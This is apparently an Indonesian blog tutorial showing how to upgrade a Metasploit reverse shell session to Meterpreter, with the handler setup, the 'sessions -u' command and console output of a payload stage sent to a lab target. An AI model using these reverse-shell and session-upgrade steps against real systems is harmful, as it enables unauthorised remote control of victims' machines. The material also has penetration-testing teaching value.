Searching...
June 8, 2012
Friday, June 08, 2012

[Metasploit] Upgrade Shell to Meterpreter

Meterpreter mungkin adalah bagian yang paling didambakan bagi para exploiter. Tidak hanya memiliki modul yang lengkap untuk memudahkan aksi eksploitasi, namun juga memiliki jalur koneksi yang secure sehingga nyaris tidak meninggalkan jejak paket dalam sebuah koneksi. Beberapa kasus yang sering ditemukan adalah, ketika exploiter menemukan sebuah kondisi dimana besar buffer tidak cukup untuk membuat system tereksploit sehingga shell code meterpreter tidak dapat di-inject kedalam paket. Pilihan terakhir yang diambil adalah dengan menggunakan payload shell yang memiliki ikuran buffer yang lebih kecil.


Dengan payload ini, attacker dapat membuka sesi shell. Sayang sekali jika kita tidak dapat membuat sesi meterpreter. Namun tenang dulu, kita masih bisa melakukan upgrade sesi kita menjadi sesi meterpreter.


Dalam kasus ini, saya menggunakan exploit/multi/handler dengan payload windows/shell_reverse_tcp, IP address saya 10.10.1.1 dan melakukan listening pada port 4444.


Sesaat kemudian, shell sesi pertama terbuka.


Bagaimana cara membuat sesi ini menjadi meterpreter?

Cukup masukan perintah berikut

Command :
msf  exploit(handler) > sessions -u 2 -q

Maka akan muncul seperti ini.

Command :
msf  exploit(handler) > sessions -u 2 -q[*] Started reverse handler on 10.10.1.1:4444
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
...
<snip>
...
[*] Sending stage (752128 bytes) to 10.10.1.128
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
msf exploit(handler) > [*] Meterpreter session 3 opened (10.10.1.1:4444 -> 10.10.1.128:1048) at 2012-06-08 10:56:08 +0700



Kemudian cek ID sesi meterpreter dengan perintah

Command :
msf  exploit(handler) > sessions -l -v

Terlihat bahwa ID sesi meterpreter adalah 3. Selanjutnya kita akses meterpreter dengan perintah.

Command :
msf  exploit(handler) > sessions -i 3 [*] Starting interaction with 3...

meterpreter >


You are so.....
Pwned by : red-dragon


2 comment:

Post a Comment

 
Back to top!